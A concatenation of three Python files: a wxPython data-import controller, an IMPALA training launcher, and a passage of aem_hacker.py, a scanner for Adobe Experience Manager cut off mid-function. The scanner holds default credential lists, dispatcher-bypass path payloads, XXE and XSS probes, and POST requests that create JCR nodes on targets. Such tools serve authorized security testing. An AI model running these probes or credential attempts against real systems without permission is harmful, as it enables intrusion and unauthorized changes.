if log_lvl == current_log_level:
current_log_level_str = log_str
choose_logging_level_dlg = wx.SingleChoiceDialog(parent=self.view, caption="Choose Logging Level",
message="Please choose an event severity level to log.",
choices=log_level_strs)
choose_logging_level_dlg.SetSelection(log_level_strs.index(current_log_level_str))
if choose_logging_level_dlg.ShowModal() == wx.ID_OK:
mainmodel.set_loglevel(choose_logging_level_dlg.GetStringSelection())
choose_logging_level_dlg.Destroy()
def on_gc(self, evt):
"""Handles request to run a full garbage collection"""
unreachable_objects = gc.collect()
info_msg = "Garbage collection successful, identified {0} objects.".format(unreachable_objects)
info_dlg = wx.MessageDialog(self.view, message=info_msg,
caption="Collection Complete", style=wx.ICON_INFORMATION)
info_dlg.ShowModal()
info_dlg.Destroy()
def import_data(self, import_fn, *args, **kwargs):
"""Imports data using the specified function"""
exception_queue = Queue.Queue()
import_thd = workerthread.WorkerThread(exception_queue=exception_queue,
target=import_fn, *args, **kwargs)
import_thd.start()
while True:
import_thd.join(0.125)
if not import_thd.is_alive():
try:
exc_type, exc = exception_queue.get(block=False)
err_str = str(exc)
if len(err_str) == 0:
err_str = exc_type.__name__
module_logger.error("Error importing text file: {0}".format(err_str))
err_msg = "An error occurred during import:\n{0}".format(err_str)
err_dlg = wx.MessageDialog(self.view, message=err_msg,
caption="Unable To Import File", style=wx.ICON_ERROR)
err_dlg.ShowModal()
except Queue.Empty:
pass
gc.collect()
break
wx.GetApp().Yield()
def choose_import_file(self, wildcard):
"""Creates a wx.FileDialog with specified wildcard for user to choose a data file to import.
Returns full path and filename of file if OK is chosen, otherwise returns None."""
import_dlg = wx.FileDialog(parent=self.view, message="Please specify a data file",
wildcard=wildcard, style=wx.FD_OPEN)
if import_dlg.ShowModal() == wx.ID_OK:
return import_dlg.GetPath()
return None
def import_hdf5(self, file_name):
"""Copies the specified HDF5 file to the data folder"""
self.import_data(self.model.copy_data, args=(file_name, ))
self.view.data_panel.populate()
def on_import_hdf5(self, evt):
"""Handles request to add HDF5 file to data folder"""
hdf5_file = self.choose_import_file(wildcard = "NDIToolbox Files (*.hdf5)|*.hdf5")
if hdf5_file is not None:
self.import_hdf5(hdf5_file)
def import_text(self, file_name):
"""Converts and imports the specified ASCII-delimited data file"""
try:
import_dlg = dlg.ImportTextDialog(parent=self.view.parent)
if import_dlg.ShowModal() == wx.ID_OK:
read_parameters = import_dlg.get_import_parameters()
self.import_data(dataio.import_txt, args=(file_name,), kwargs=read_parameters)
self.view.data_panel.populate()
finally:
import_dlg.Destroy()
def on_import_text(self, evt):
"""Handles request to add ASCII data to data folder"""
txt_wildcards = ["TXT (*.txt)|*.txt", "CSV (*.csv)|*.csv",
"DAT (*.dat)|*.dat", "TAB (*.tab)|*.tab",
"All Files (*.*)|*.*"]
text_file = self.choose_import_file(wildcard="|".join(txt_wildcards))
if text_file is not None:
self.import_text(text_file)
def on_export_text(self, evt):
"""Handles request to export selected data to delimited ASCII"""
file_dlg = wx.FileDialog(parent=self.view, message="Please specify an output filename.",
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT)
if file_dlg.ShowModal() == wx.ID_OK:
exportfmt_dlg = dlg.ExportTextDialog(parent=self.view.parent)
if exportfmt_dlg.ShowModal() == wx.ID_OK:
wx.BeginBusyCursor()
export_params = exportfmt_dlg.get_export_parameters()
exception_queue = Queue.Queue()
export_text_thd = workerthread.WorkerThread(exception_queue=exception_queue,
target=dataio.export_txt,
args=(file_dlg.GetPath(), self.view.data_panel.data),
kwargs=export_params)
export_text_thd.start()
while True:
export_text_thd.join(0.125)
if not export_text_thd.is_alive():
try:
exc_type, exc = exception_queue.get(block=False)
err_str = str(exc)
if len(err_str) == 0:
err_str = exc_type.__name__
module_logger.error("Error exporting to text file: {0}".format(err_str))
err_msg = "An error occurred during export:\n{0}".format(err_str)
err_dlg = wx.MessageDialog(self.view, message=err_msg,
caption="Unable To Export File", style=wx.ICON_ERROR)
err_dlg.ShowModal()
except Queue.Empty:
pass
break
wx.GetApp().Yield()
wx.EndBusyCursor()
exportfmt_dlg.Destroy()
def on_slice_data(self, evt):
"""Handles request to export a slice of data"""
slice_dlg = dlg.ExportSliceDialog(parent=self.view, datafile=self.view.data_panel.data)
if slice_dlg.ShowModal() == wx.ID_OK:
try:
wx.BeginBusyCursor()
sliced_data = dataio.get_data(self.view.data_panel.data, slice_dlg.get_slice())
sliced_data_fname = "_".join(["sliced",
os.path.basename(self.view.data_panel.data)])
fname_dlg = wx.TextEntryDialog(parent=self.view, message="Please specify a filename for the sliced data.",
caption="Save Sliced Data", defaultValue=sliced_data_fname)
if fname_dlg.ShowModal() == wx.ID_OK:
dest_fname = os.path.join(pathfinder.data_path(), fname_dlg.GetValue())
dataio.save_data(dest_fname, sliced_data)
self.view.data_panel.populate()
except TypeError: # bad dimensions
err_dlg = wx.MessageDialog(self.view, message="Specified dimensions out of range for this data.",
caption="Unable To Slice Data", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
except ValueError: # zero-length slices, etc.
err_dlg = wx.MessageDialog(self.view, message="Zero-length slices are not permitted.",
caption="Unable To Slice Data", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
finally:
wx.EndBusyCursor()
slice_dlg.Destroy()
def import_dicom(self, file_name):
"""Converts and imports the specified DICOM/DICONDE data file"""
self.import_data(dataio.import_dicom, args=(file_name,))
self.view.data_panel.populate()
def on_import_dicom(self, evt):
"""Handles request to add DICOM/DICONDE data to data folder"""
wildcards = "DICOM files (*.dcm)|*.dcm|All Files (*.*)|*.*"
dicom_file = self.choose_import_file(wildcards)
if dicom_file is not None:
self.import_dicom(dicom_file)
def import_image(self, file_name):
"""Converts and imports the specified bitmap image. Requires PIL.
"""
# Check for PIL
try:
from PIL import Image
module_logger.info("from PIL import Image successful.")
except ImportError:
module_logger.error("from PIL import Image failed, trying second format.")
try:
import Image
module_logger.info("import Image successful.")
except ImportError: # PIL not installed
module_logger.error("import Image failed to import PIL.")
err_dlg = wx.MessageDialog(self.view,
message="Please install the Python Imaging Library (PIL).",
caption="PIL Module Required", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
return
flatten_img = True
msg = "The image data should be converted to grayscale for data analysis. Proceed?"
flatten_dlg = wx.MessageDialog(parent=self.view.parent,
message=msg,
caption="Flatten Palette?",
style=wx.YES_NO | wx.YES_DEFAULT)
if flatten_dlg.ShowModal() == wx.ID_NO:
flatten_img = False
self.import_data(dataio.import_img, args=(file_name, flatten_img))
self.view.data_panel.populate()
def on_import_image(self, evt):
"""Handles request to add image data to data folder"""
img_wildcards = ["All Files (*.*)|*.*", "BMP (*.bmp)|*.bmp", "DCX (*.dcx)|*.dcx",
"EPS (*.eps)|*.eps", "GIF (*.gif)|*.gif", "IM (*.im)|*.im",
"IMT (*.imt)|*.imt", "JPEG (*.jpg,*.jpeg)|*.jpg;*.jpeg",
"PCX (*.pcx)|*.pcx", "PNG (*.png)|*.png", "PPM (*.ppm)|*.ppm",
"PSD (*.psd)|*.psd", "SGI (*.sgi)|*.sgi", "TGA (*.tga)|*.tga",
"TIFF (*.tiff)|*.tiff", "XPM (*.xpm)|*.xpm"]
img_file = self.choose_import_file(wildcard="|".join(img_wildcards))
if img_file is not None:
self.import_image(img_file)
def import_csc(self, file_name):
"""Converts and imports a UTWin Cscan data file"""
self.import_data(dataio.import_utwin, args=(file_name,))
self.view.data_panel.populate()
def on_import_csc(self, evt):
"""Handles request to add UTWin Cscan data to data folder"""
wildcards = "UTWin CScans (*.csc)|*.csc|All Files (*.*)|*.*"
csc_file = self.choose_import_file(wildcards)
if csc_file is not None:
self.import_csc(csc_file)
def import_sdt(self, file_name):
"""Converts and imports a Winspect 6/7 data file"""
self.import_data(dataio.import_winspect, args=(file_name,))
self.view.data_panel.populate()
def on_import_sdt(self, evt):
"""Handles request to add Winspect data to data folder"""
wildcards = "Winspect 6/7 CScans (*.sdt)|*.sdt|All Files (*.*)|*.*"
sdt_file = self.choose_import_file(wildcards)
if sdt_file is not None:
self.import_sdt(sdt_file)
def on_data_info(self, evt):
"""Handles request to display info about selected data"""
self.show_data_info()
def show_data_info(self):
"""Displays info about selected data"""
if self.view.data_panel.data is not None:
try:
wx.BeginBusyCursor()
data_info = self.model.get_data_info(self.view.data_panel.data)
if data_info is not None:
data_msg = "File Size: {0} bytes\n\nData Dimensions: {1}\nData Shape: {2}\nNumber of Points: {3} ({4} data type)".format(
data_info['filesize'], data_info['ndim'], data_info['shape'], data_info['numpoints'], data_info['dtype']
)
else:
data_msg = "Unable to read {0}".format(self.view.data_panel.data)
info_dlg = wx.MessageDialog(parent=self.view, message=data_msg,
caption=os.path.basename(self.view.data_panel.data), style=wx.OK)
info_dlg.ShowModal()
info_dlg.Destroy()
except MemoryError:
err_dlg = wx.MessageDialog(self.view,
message="Insufficient memory to load data.",
caption="Unable To Query Data File", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
finally:
wx.EndBusyCursor()
def on_remove_data(self, evt):
"""Handles request to remove data from data folder"""
if self.view.data_panel.data is not None:
confirm_deletion_dlg = wx.MessageDialog(parent=self.view.parent,
caption="Delete File?",
message="Are you sure you want to delete this"\
" file?",
style=wx.OK | wx.CANCEL)
if confirm_deletion_dlg.ShowModal() == wx.ID_OK:
self.model.remove_data(self.view.data_panel.data)
self.view.data_panel.populate()
def on_preview_data(self, evt):
"""Handles request to preview data"""
if self.view.data_panel.data is not None:
try:
wx.BeginBusyCursor()
data_window = preview_window.PreviewWindow(parent=self.view,
data_file=self.view.data_panel.data)
if data_window.has_data():
data_window.Show()
finally:
wx.EndBusyCursor()
def on_plot_data(self, evt):
"""Handles request to generate X-Y plot of selected data"""
if self.view.data_panel.data is not None:
wx.BeginBusyCursor()
plt_window = plotwindow.PlotWindow(self.view, data_file=self.view.data_panel.data)
if plt_window.has_data():
plt_window.Show()
wx.EndBusyCursor()
def on_imageplot_data(self, evt):
"""Handles request to generate image plot of selected data"""
if self.view.data_panel.data is not None:
wx.BeginBusyCursor()
try:
plt_window = plotwindow.ImgPlotWindow(parent=self.view,
data_file=self.view.data_panel.data)
if plt_window.has_data():
plt_window.Show()
except Exception: # Error occurred
return
finally:
wx.EndBusyCursor()
def on_megaplot_data(self, evt):
"""Handles request to generate megaplot of selected data"""
if self.view.data_panel.data is not None:
wx.BeginBusyCursor()
try:
plt_window = plotwindow.MegaPlotWindow(parent=self.view, data_file=self.view.data_panel.data)
if plt_window.has_data():
plt_window.Show()
except IndexError: # data not 3D
module_logger.error("User attempted to use MegaPlot on data that is not three-dimensional.")
err_dlg = wx.MessageDialog(self.view,
message="Data must have three dimensions.",
caption="Unable To Plot Data", style=wx.ICON_ERROR)
err_dlg.ShowModal()
err_dlg.Destroy()
finally:
wx.EndBusyCursor()
def on_run_podtk(self, evt):
"""Handles request to run POD Toolkit"""
podtk_ui = podtk.PODWindow(parent=self.view)
podtk_ui.Show()
def on_run_adatk(self, evt):
"""Handles request to run ADA Toolkit"""
adatk_ui = adatk.ADAWindow(parent=self.view)
adatk_ui.Show()
def on_run_DSF_podtk(self, evt):
"""Handles request to run TRI/Austin POD Toolkit"""
podtk_ui = DSF_podtk.DSF_PODWindow(parent=self.view)
podtk_ui.Show()
|
main.py | import copy
from multiprocessing.managers import BaseManager
import gym
import numpy as np
import torch.multiprocessing as mp
from impala.actor import actor
from impala.learner import learner
from impala.model import Network
from impala.parameter_server import ParameterServer
NUM_ACTORS = 4
ACTOR_TIMEOUT = 500000
if __name__ == "__main__":
env = gym.make('CartPole-v1')
env.seed(42)
nS = np.shape(env.observation_space)[0]
nA = env.action_space.n
queue = mp.Queue()
learner_model = Network(nS, nA, "cpu")
actor_model = Network(nS, nA, "cpu")
BaseManager.register('ParameterServer', ParameterServer)
manager = BaseManager()
manager.start()
parameter_server = manager.ParameterServer()
learner = mp.Process(target = learner, args=(learner_model, queue, parameter_server))
# Currently each actor has its own object via deepcopy. What happens if I don't explicitly do deepcopy?
actors = [mp.Process(target = actor, args = (copy.deepcopy(actor_model), queue, copy.deepcopy(env), parameter_server)) for i in range(NUM_ACTORS)]
[actor.start() for actor in actors]
learner.start()
[actor.join() for actor in actors]
learner.join()
|
aem_hacker.py | import concurrent.futures
import itertools
import json
import datetime
import traceback
import sys
import argparse
import base64
import time
from collections import namedtuple
from http.server import BaseHTTPRequestHandler, HTTPServer
from random import choice, randint
from string import ascii_letters
from threading import Thread
import requests
requests.packages.urllib3.disable_warnings()
CREDS = ('admin:admin',
'author:author',
'grios:password',
'replication-receiver:replication-receiver',
'vgnadmin:vgnadmin',
'aparker@geometrixx.info:aparker',
'jdoe@geometrixx.info:jdoe',
'james.devore@spambob.com:password',
'matt.monroe@mailinator.com:password',
'aaron.mcdonald@mailinator.com:password',
'jason.werner@dodgit.com:password')
def random_string(length=10):
return ''.join([choice(ascii_letters) for _ in range(length)])
registered = {} # Registered checks
token = random_string() # Token to recognize SSRF was triggered
d = {} # store SSRF detections
extra_headers = {}
class Detector(BaseHTTPRequestHandler):
def __init__(self, token, d, *args):
self.d = d
self.token = token
BaseHTTPRequestHandler.__init__(self, *args)
def log_message(self, format, *args):
return
def do_GET(self):
self.serve()
def do_POST(self):
self.serve()
def do_PUT(self):
self.serve()
def serve(self):
try:
token, key, value = self.path.split('/')[1:4]
except:
self.send_response(200)
return
if self.token != token:
self.send_response(200)
return
if key in self.d:
self.d[key].append(value)
else:
self.d[key] = [value, ]
self.send_response(200)
def register(name):
def decorator(func):
registered[name] = func
return func
return decorator
Finding = namedtuple('Finding', 'name, url, description')
def normalize_url(base_url, path):
if base_url[-1] == '/' and (path[0] == '/' or path[0] == '\\'):
url = base_url[:-1] + path
else:
url = base_url + path
return url
def content_type(ct):
return ct.split(';')[0].lower().strip()
def error(message, **kwargs):
print('[{}] {}'.format(datetime.datetime.now().time(), message), sys.stderr)
for n, a in kwargs.items():
print('\t{}={}'.format(n, a), sys.stderr)
exc_type, exc_value, exc_traceback = sys.exc_info()
print('Exception type:' + str(exc_type), sys.stderr)
print('Exception value:' + str(exc_value), sys.stderr)
print('TRACE:', sys.stderr)
traceback.print_tb(exc_traceback, file=sys.stderr)
print('\n\n\n', sys.stderr)
def http_request(url, method='GET', data=None, additional_headers=None, proxy=None, debug=False):
headers = {'User-Agent': 'curl/7.30.0'}
if additional_headers:
headers.update(additional_headers)
if extra_headers:
headers.update({
# Retrieve the headers configured as extra headers but not controlled
# by the application in this specific request
h_name: h_value
for h_name, h_value in extra_headers.items()
if h_name not in headers
})
if not proxy:
proxy = {}
if debug:
print('>> Sending {} {}'.format(method, url))
resp = requests.request(method, url, data=data, headers=headers, proxies=proxy, verify=False, timeout=40, allow_redirects=False)
if debug:
print('<< Received HTTP-{}', resp.status_code)
return resp
def http_request_multipart(url, method='POST', data=None, additional_headers=None, proxy=None, debug=False):
headers = {'User-Agent': 'curl/7.30.0'}
if additional_headers:
headers.update(additional_headers)
if extra_headers:
headers.update({
# Retrieve the headers configured as extra headers but not controlled
# by the application in this specific request
h_name: h_value
for h_name, h_value in extra_headers.items()
if h_name not in headers
})
if not proxy:
proxy = {}
if debug:
print('>> Sending {} {}'.format(method, url))
resp = requests.request(method, url, files=data, headers=headers, proxies=proxy, verify=False, timeout=40, allow_redirects=False)
if debug:
print('<< Received HTTP-{}', resp.status_code)
return resp
def preflight(url, proxy=None, debug=False):
try:
http_request(url, proxy=proxy, debug=debug)
except:
return False
else:
return True
@register('set_preferences')
def exposed_set_preferences(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
SETPREFERENCES = itertools.product(('/crx/de/setPreferences.jsp', '///crx///de///setPreferences.jsp'),
(';%0a{0}.html', '/{0}.html'),
('?keymap=<1337>&language=0',))
SETPREFERENCES = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in SETPREFERENCES)
results = []
for path in SETPREFERENCES:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 400:
if '<1337>' in resp.content.decode():
f = Finding('SetPreferences', url,
'Page setPreferences.jsp is exposed, XSS might be possible via keymap parameter.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_set_preferences', url=url)
return results
@register('merge_metadata')
def exposed_merge_metadata(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
MERGEMETADATA = itertools.product(('/libs/dam/merge/metadata', '///libs///dam///merge///metadata'),
('.html', '.css/{0}.html', '.ico/{0}.html', '....4.2.1....json/{0}.html',
'.css;%0a{0}.html', '.ico;%0a{0}.html'),
('?path=/etc&.ico',))
MERGEMETADATA = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in MERGEMETADATA)
results = []
for path in MERGEMETADATA:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['assetPaths']
except:
pass
else:
f = Finding('MergeMetadataServlet', url,
'MergeMetadataServlet is exposed, XSS might be possible via path parameter.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_merge_metadata', url=url)
return results
@register('get_servlet')
def exposed_get_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GETSERVLET = itertools.product(('/', '/etc', '/var', '/apps', '/home', '///etc', '///var', '///apps', '///home'),
('', '.children'),
('.json', '.1.json', '....4.2.1....json', '.json?{0}.css', '.json?{0}.ico', '.json?{0}.html',
'.json/{0}.css', '.json/{0}.html', '.json/{0}.png', '.json/{0}.ico',
'.json;%0a{0}.css', '.json;%0a{0}.png', '.json;%0a{0}.html', '.json;%0a{0}.ico'))
GETSERVLET = list('{0}{1}{2}'.format(p1, p2, p3.format(r)) for p1, p2, p3 in GETSERVLET)
results = []
for path in GETSERVLET:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())
if not 'jcr:primaryType' in resp.content.decode():
raise Exception()
except:
pass
else:
f = Finding('DefaultGetServlet', url,
'Sensitive information might be exposed via AEM\'s DefaultGetServlet. '
'Check child nodes manually for secrets exposed, see - '
'https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43')
results.append(f)
except:
if debug:
error('Exception while performing a check', check='exposed_get_servlet', url=url)
return results
@register('querybuilder_servlet')
def exposed_querybuilder_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
QUERYBUILDER = itertools.product(('/bin/querybuilder.json', '///bin///querybuilder.json', '/bin/querybuilder.feed', '///bin///querybuilder.feed'),
('', '.css', '.ico', '.png', '.gif', '.html', '.1.json', '....4.2.1....json',
';%0a{0}.css', ';%0a{0}.png', ';%0a{0}.html', ';%0a{0}.ico', '.ico;%0a{0}.ico',
'.css;%0a{0}.css', '.html;%0a{0}.html', '?{0}.css', '?{0}.ico'))
QUERYBUILDER = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in QUERYBUILDER)
results = []
found_json = False
found_feed = False
for path in QUERYBUILDER:
if found_feed and found_json:
break
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['hits']
except:
pass
else:
if found_json:
continue
f = Finding('QueryBuilderJsonServlet', url,
'Sensitive information might be exposed via AEM\'s QueryBuilderJsonServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
results.append(f)
found_json = True
if '</feed>' in str(resp.content):
if found_feed:
continue
f = Finding('QueryBuilderFeedServlet', url,
'Sensitive information might be exposed via AEM\'s QueryBuilderFeedServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html')
results.append(f)
found_feed = True
except:
if debug:
error('Exception while performing a check', check='exposed_querybuilder_servlet', url=url)
return results
@register('gql_servlet')
def exposed_gql_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GQLSERVLET = itertools.product(('/bin/wcm/search/gql', '///bin///wcm///search///gql'),
('.json', '....1....json', '.json/{0}.css', '.json/{0}.html', '.json/{0}.ico', '.json/{0}.png',
'.json;%0a{0}.css', '.json;%0a{0}.ico', '.json;%0a{0}.html', '.json;%0a{0}.png'),
('?query=type:User%20limit:..1&pathPrefix=&p.ico',))
GQLSERVLET = list('{0}{1}{2}'.format(p1, p2.format(r), p3) for p1, p2, p3 in GQLSERVLET)
results = []
for path in GQLSERVLET:
url = normalize_url(base_url, path)
try:
resp = http_request(url, proxy=proxy)
if resp.status_code == 200:
try:
json.loads(resp.content.decode())['hits']
except:
pass
else:
f = Finding('GQLServlet', url,
'Sensitive information might be exposed via AEM\'s GQLServlet. '
'See - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_gql_servlet', url=url)
return results
@register('guide_internal_submit_servlet')
def exposed_guide_internal_submit_servlet_xxe(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
GuideInternalSubmitServlet = itertools.product(('/content/forms/af/geometrixx-gov/application-for-assistance/jcr:content/guideContainer',
'/content/forms/af/geometrixx-gov/geometrixx-survey-form/jcr:content/guideContainer',
'/content/forms/af/geometrixx-gov/hardship-determination/jcr:content/guideContainer',
'/libs/fd/af/components/guideContainer/cq:template',
'///libs///fd///af///components///guideContainer///cq:template',
'/libs/fd/af/templates/simpleEnrollmentTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///simpleEnrollmentTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/surveyTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///surveyTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/blankTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///blankTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer',
'/libs/fd/af/templates/surveyTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///surveyTemplate///jcr:content///guideContainer',
'/libs/fd/af/templates/tabbedEnrollmentTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///tabbedEnrollmentTemplate///jcr:content///guideContainer',
'/libs/fd/af/templates/tabbedEnrollmentTemplate2/jcr:content/guideContainer',
'///libs///fd///af///templates///tabbedEnrollmentTemplate2///jcr:content///guideContainer',
'/libs/fd/af/templates/simpleEnrollmentTemplate/jcr:content/guideContainer',
'///libs///fd///af///templates///simpleEnrollmentTemplate///jcr:content///guideContainer',
'/libs/settings/wcm/template-types/afpage/initial/jcr:content/guideContainer',
'///libs///settings///wcm///template-types///afpage///initial///jcr:content///guideContainer',
'/libs/settings/wcm/template-types/afpage/structure/jcr:content/guideContainer',
'///libs///settings///wcm///template-types///afpage///structure///jcr:content///guideContainer',
'/apps/geometrixx-gov/templates/enrollment-template/jcr:content/guideContainer',
'/apps/geometrixx-gov/templates/survey-template/jcr:content/guideContainer',
'/apps/geometrixx-gov/templates/tabbed-enrollment-template/jcr:content/guideContainer'),
('.af.internalsubmit.json', '.af.internalsubmit.1.json', '.af.internalsubmit...1...json',
'.af.internalsubmit.html', '.af.internalsubmit.js', '.af.internalsubmit.css',
'.af.internalsubmit.ico', '.af.internalsubmit.png', '.af.internalsubmit.gif',
'.af.internalsubmit.svg', '.af.internalsubmit.ico;%0a{0}.ico',
'.af.internalsubmit.html;%0a{0}.html', '.af.internalsubmit.css;%0a{0}.css'))
GuideInternalSubmitServlet = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in GuideInternalSubmitServlet)
results = []
for path in GuideInternalSubmitServlet:
url = normalize_url(base_url, path)
try:
data = 'guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}'
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if resp.status_code == 200 and '<afData>ABC' in str(resp.content):
f = Finding('GuideInternalSubmitServlet', url,
'GuideInternalSubmitServlet is exposed, XXE is possible.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_guide_internal_submit_servlet_xxe', url=url)
return results
@register('post_servlet')
def exposed_post_servlet(base_url, my_host, debug=False, proxy=None):
r = random_string(3)
POSTSERVLET = itertools.product(('/', '/content', '/content/dam'),
('.json', '.1.json', '...4.2.1...json', '.json/{0}.css', '.json/{0}.html',
'.json;%0a{0}.css', '.json;%0a{0}.html'))
POSTSERVLET = list('{0}{1}'.format(p1, p2.format(r)) for p1, p2 in POSTSERVLET)
results = []
for path in POSTSERVLET:
url = normalize_url(base_url, path)
try:
data = ':operation=nop'
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy, debug=debug)
if resp.status_code == 200 and 'Null Operation Status:' in str(resp.content):
f = Finding('POSTServlet', url,
'POSTServlet is exposed, persistent XSS or RCE might be possible, it depends on your privileges.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='exposed_post_servlet', url=url)
return results
@register('create_new_nodes')
def create_new_nodes(base_url, my_host, debug=False, proxy=None):
CREDS = ('admin:admin', 'author:author')
nodename1 = random_string()
r1 = random_string(3)
POSTSERVLET1 = itertools.product(('/content/usergenerated/etc/commerce/smartlists/', '/content/usergenerated/'),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css', '{0}.json/{1}.html',
'{0}.json/{1}.ico', '{0}.json/{1}.png', '{0}.json/{1}.1.json',
'{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html', '{0}.json;%0a{1}.png',
'{0}.json;%0a{1}.ico', '{0}....4.2.1....json', '{0}?{1}.ico',
'{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
'{0}?{1}....4.2.1....json'))
POSTSERVLET1 = list('{0}{1}'.format(p1, p2.format(nodename1, r1)) for p1, p2 in POSTSERVLET1)
nodename2 = random_string()
r2 = random_string(3)
POSTSERVLET2 = itertools.product(('/', '/content/', '/apps/', '/libs/'),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
'{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
'{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
'{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico', '{0}....4.2.1....json',
'{0}?{1}.ico', '{0}?{1}.css', '{0}?{1}.html', '{0}?{1}.json',
'{0}?{1}.1.json', '{0}?{1}....4.2.1....json'))
POSTSERVLET2 = list('{0}{1}'.format(p1, p2.format(nodename2, r2)) for p1, p2 in POSTSERVLET2)
results = []
for path in POSTSERVLET1:
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url}
resp = http_request(url, 'POST', additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes', url,
'It\'s possible to create new JCR nodes using POST Servlet as anonymous user. '
'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.')
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes', url=url)
for path, creds in itertools.product(POSTSERVLET2, CREDS):
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
data = 'a=b'
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes', url,
'It\'s possible to create new JCR nodes using POST Servlet as "{0}" user. '
'You might get persistent XSS or RCE.'.format(creds))
results.append(f)
break
except:
if debug:
error('Exception while performing a check', check='create_new_nodes', url=url)
return results
@register('create_new_nodes2')
def create_new_nodes2(base_url, my_host, debug=False, proxy=None):
CREDS = ('author:author', 'grios:password', 'aparker@geometrixx.info:aparker', 'jdoe@geometrixx.info:jdoe',
'james.devore@spambob.com:password', 'matt.monroe@mailinator.com:password',
'aaron.mcdonald@mailinator.com:password', 'jason.werner@dodgit.com:password')
nodename = random_string()
r = random_string(3)
POSTSERVLET = itertools.product(('/home/users/geometrixx/{0}/', ),
('*', '{0}.json', '{0}.1.json', '{0}.json/{1}.css',
'{0}.json/{1}.html', '{0}.json/{1}.ico', '{0}.json/{1}.png',
'{0}.json/{1}.1.json', '{0}.json;%0a{1}.css', '{0}.json;%0a{1}.html',
'{0}.json;%0a{1}.png', '{0}.json;%0a{1}.ico',
'{0}....4.2.1....json', '{0}?{1}.ico', '{0}?{1}.css',
'{0}?{1}.html', '{0}?{1}.json', '{0}?{1}.1.json',
'{0}?{1}....4.2.1....json'))
POSTSERVLET = list('{0}{1}'.format(p1, p2.format(nodename, r)) for p1, p2 in POSTSERVLET)
results = []
for path, creds in itertools.product(POSTSERVLET, CREDS):
path = path.format(creds.split(':')[0])
url = normalize_url(base_url, path)
try:
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': base_url,
'Authorization': 'Basic {}'.format(base64.b64encode(creds.encode()).decode())}
data = 'a=b'
resp = http_request(url, 'POST', data=data, additional_headers=headers, proxy=proxy)
if '<td>Parent Location</td>' in str(resp.content) and resp.status_code in [200, 201]:
f = Finding('CreateJCRNodes 2', url,
'It\'s possible to create new JCR nodes using POST Servlet. As Geometrixx user "{0}". '
'You might get persistent XSS or perform other attack by accessing servlets registered by Resource Type.'.format(creds))
results.append(f)
break
except:
if debug:
